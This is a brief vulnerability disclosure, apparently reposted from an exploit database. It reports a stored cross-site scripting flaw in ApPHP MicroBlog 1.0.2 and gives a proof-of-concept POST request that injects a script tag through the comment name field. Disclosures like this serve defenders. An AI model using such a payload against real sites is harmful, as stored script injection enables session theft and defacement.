By HireHackking in HACKER
· 1 view
# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross
Site Scripting
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162
Description :
Vulnerable link : http://site_name/path/index.php?page=posts&post_id=
Stored XSS Payload ( Comments ): *
# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
############ POST DATA ############
task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment
############ ######################
Recommended Comments